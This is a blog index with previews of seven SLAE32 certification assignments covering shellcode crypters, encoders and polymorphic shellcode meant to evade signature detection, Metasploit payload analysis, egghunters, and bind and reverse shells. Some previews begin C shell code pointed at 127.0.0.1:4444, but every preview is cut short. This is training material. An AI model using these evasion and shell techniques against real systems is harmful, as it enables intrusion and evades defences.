Posts

Showing posts from July, 2020

SLAE32 - Assignment 7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Crypters For this assignment, students are tasked with creating a custom shellcode crypter.
Requirements: Create a custom crypter like the one shown in the "crypters" videoFree to use any existing encryption schemaCan use any programming language Task 7 was... interesting. By far the most time spent headbanging (to metal and against metal), while also sporting the biggest facepalm.
My original plan did end up being the outcome, although it took a detour and ended up at the same result. For this task I decided to go the AES CBC route-- it's a common and easily implemented encryption scheme. Using this article, I was able to come up with a PoC encryption / decryption script pretty quickly. I…

SLAE32 - Assignment 5

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Shellcode Analysis This task requests students to disassemble and analyze at least three shellcode samples created by metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc had not yet been combined into msfvenom, which is what I'll obviously use.

Requirements:
Take up at least 3 shellcode samples created using Msfpayload for linux/x86Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcodePresent your analysis I decided to perform analysis on the following three payloads: shell_reverse_tcp (a non-staged reverse shell)shell_bind_tcp (a non-staged bind shell)adduser(a payload for adding a user, duh) Although not the …

SLAE32 - Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Polymorphic Shellcodes Assignment 6 required students to take three shellcodes from shellstorm and create polymorphic versions of them.

Requirements:

Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matchingThe polymorphic versions cannot be larger 150% of the existing shellcode Shellcode 1: The first shellcode I chose for this assignment was a shellcode which adds a value to an /etc/hosts file, available here
I like the idea here, as it's a little out of the normal shellcode tactic. It's not 'covert' but it certainly isn't just spawning /bin/bash :shrug The original shellcode is 77 bytes, so it's not huge, especially considering the…

SLAE32 - Assignment 4

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Encoders For this assignment, students were tasked with creating a custom encoding scheme, such as the "Insertion Encoder" from the course.
Requirements: Create a custom encoding scheme like the “Insertion Encoder”Write a PoC using execve-stack as the shellcode to encode with your schema and execute Pretty simple! For this task, I decided to start with a simple ROT cipher as we're simply trying to avoid signature based detections. In python, that might look like this: >>> input = 1 >>> rotate = 13 >>> out = input + rotate >>> print(out) 14 That's pretty... expected, haha. Translated to asm, that's still very simple and there's a number of ways…

SLAE32 - Assignment 3

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Egghunters! Woooo! I love egghunters, I think they're super cool.
There's a lot of information out there on the web about egghunters, and some really good papers too (e.g. Skape). If you're totally unfamiliar and just want the tldr, here's the gist of it:

Let's say you are testing some sort of server application, maybe it's an FTP app. The application has a couple different commands that accept some input, but when you send certain data to one of the commands, the application crashes in a way that allows you to control the flow of execution. "Hooray!" you might be thinking, "Now I can send my payload!"

To your dismay, after sending payload after payload you …

SLAE32 - Assignment 2

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Reverse ShellRequirements: Connects to configured IP and portExecs shell on successful connectionIP and port should be 'easily' configurable As with the TCP Bind shell from assignment one, I decided the best bet was to write out a reverse shell in C. There's a million resources out there, and the code I came up with is as follows: /* C reverse shell for SLAE */                     #include <unistd .h=""> #include <netinet in.h=""> #include <sys socket.h=""> #include <sys types.h=""> #define rhost "127.0.0.1" #define rport "4444"  int main(int argc, char *argv[])                  {���������������������…

SLAE32 - Assignment 1

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Bind ShellRequirements: Binds to a portExecutes a shell on incoming connectionPort should be 'easily' configurable For this assignment, I started like many others and first disassembled metasploit shellcode. It had the basic principals I expected, but to my dismay it didn't really help me to write my own-- MSF's shellcodes are well optimized, so I felt like I'd basically just be copying code, rather than learning to implement it myself. I decided to first write a bind shell in C, as it's low level and I'd be (essentially) making the same calls:
// Shell_bind_tcp // For SLAE32 // Howard McGreehan #include <sys/socket.h> #include <unistd.h> #include <netinet…